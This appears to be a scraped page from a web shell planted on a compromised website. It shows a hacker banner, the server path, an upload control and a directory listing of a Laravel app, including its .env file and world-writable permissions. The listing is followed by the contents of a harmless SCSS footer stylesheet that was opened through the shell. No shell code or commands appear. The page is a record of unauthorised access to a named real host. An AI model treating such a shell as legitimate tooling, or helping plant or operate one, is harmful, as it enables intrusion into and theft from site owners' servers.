I am a hacker in the dark of a very cold night
path :/var/www/html/vorne.webheaydemo.com
upload file:
List of files:
| name file |
size |
edit |
permission |
action |
| .editorconfig | 276 KB | March 05 2024 07:12:34 | 0666 |
|
| .env | 1385 KB | May 24 2024 16:43:55 | 0666 |
|
| .env.example | 1088 KB | March 05 2024 07:12:34 | 0666 |
|
| .gitattributes | 190 KB | March 05 2024 07:12:34 | 0666 |
|
| .gitignore | 245 KB | March 05 2024 07:12:34 | 0666 |
|
| .htaccess | 947 KB | July 04 2023 21:25:08 | 0664 |
|
| .rnd | 1024 KB | March 13 2024 04:51:14 | 0666 |
|
| README.md | 472 KB | March 22 2024 10:35:00 | 0666 |
|
| app | - | March 05 2024 07:12:34 | 0777 |
|
| artisan | 1739 KB | March 05 2024 07:12:34 | 0666 |
|
| bootstrap | - | March 05 2024 07:12:34 | 0777 |
|
| composer.json | 2829 KB | May 13 2024 12:10:04 | 0666 |
|
| composer.lock | 417205 KB | March 19 2024 12:13:14 | 0666 |
|
| config | - | July 03 2025 02:53:36 | 0777 |
|
| database | - | March 05 2024 07:12:34 | 0777 |
|
| index.php | 1816 KB | May 13 2024 10:32:36 | 0666 |
|
| lang | - | May 13 2024 14:53:26 | 0777 |
|
| manifest.json | 913 KB | May 14 2024 03:57:26 | 0664 |
|
| package.json | 398 KB | March 05 2024 07:12:34 | 0666 |
|
| phpunit.xml | 1206 KB | March 05 2024 07:12:34 | 0666 |
|
| public | - | July 03 2025 02:37:20 | 0777 |
|
| resources | - | May 13 2024 12:09:36 | 0777 |
|
| routes | - | March 05 2024 07:12:34 | 0777 |
|
| service-worker.js | 924 KB | March 05 2024 07:12:34 | 0666 |
|
| storage | - | March 05 2024 10:03:52 | 0777 |
|
| symlink.php | 218 KB | March 05 2024 07:12:34 | 0666 |
|
| tests | - | March 05 2024 07:12:34 | 0777 |
|
| vendor | - | March 19 2024 12:13:14 | 0777 |
|
| vite.config.js | 326 KB | March 05 2024 07:12:34 | 0666 |
|
/*--------------------------------------------------------------
# Footer-block
--------------------------------------------------------------*/
.footer-section{
position: relative;
padding-top: 200px;
@media only screen and (max-width: 1199px) {
padding-top: 150px;
}
@media only screen and (max-width: 575px) {
padding-top: 100px;
}
.footer-shape{
position: absolute;
top: -10px;
left: 0;
}
}
.footer-logo{
margin-bottom: 30px;
a{
margin: 0 auto;
padding: 0;
border: none;
}
}
.footer-widget{
.title{
color: $white;
position: relative;
font-family: $font_heading;
margin-bottom: 30px;
}
.footer-shpae{
width: 140px;
margin-bottom: 20px;
}
p{
color: $white;
font-size: 14px;
line-height: 2;
}
}
.newsletter-form{
position: relative;
margin-top: 30px;
input{
background-color: rgba($white,0.1) !important;
border: none !important;
border-radius: 15px;
padding: 15px 25px;
height: 55px;
color: #858687 !important;
font-weight: 400;
font-family: $font_body;
font-size: 14px;
&::placeholder{
color: #858687;
}
}
button{
position: absolute;
top: 0;
right: 0;
border-radius: 15px;
font-family: $font_sub_heading;
font-size: 18px;
letter-spacing: 1px;
padding: 15px 35px;
}
}
.footer-list{
li{
color: $white;
font-size: 14px;
padding-left: 20px;
padding-bottom: 8px;
margin-bottom: 8px;
position: relative;
border-bottom: 1px dashed rgba($white,0.1);
transition: all 0.3s;
&:hover{
color: $base--color;
i{
color: $base--color;
}
}
&:last-child{
border: none;
padding-bottom: 0;
margin-bottom: 0;
}
a{
display: block;
}
&::before{
position: absolute;
content: '';
top: 7px;
left: 0;
width: 10px;
height: 10px;
border-radius: 100px;
background-color: $base--color;
}
i{
position: relative;
top: 4px;
color: $white;
float: right;
transition: all 0.3s;
}
}
}
.social-area{
display: flex;
align-items: center;
margin-top: 30px;
span{
color: $white;
margin-right: 15px;
}
}
.footer-social li {
width: 35px;
height: 35px;
line-height: 35px;
text-align: center;
display: inline-block;
border-radius: 50%;
background: transparent;
background-color: rgba($white,0.1);
// border: 2px solid rgba($white,0.1);
color: $white;
font-size: 12px;
transition: all 0.3s;
&.active,
&:hover{
color: $white;
background-color: $base--color;
}
}
.footer-social li + li {
margin-left: 10px;
}
.copyright-area{
padding: 30px 0;
text-align: center;
border-top: 1px solid rgba($white,0.1);
margin-top: 100px;
p{
font-size: 16px;
letter-spacing: 2px;
margin-bottom: 0;
color: $white;
font-family: $font_heading;
@media only screen and (max-width: 575px) {
font-size: 14px;
}
span{
color: $base--color;
font-size: 18px;
letter-spacing: 1px;
font-family: $font_sub_heading;
}
}
}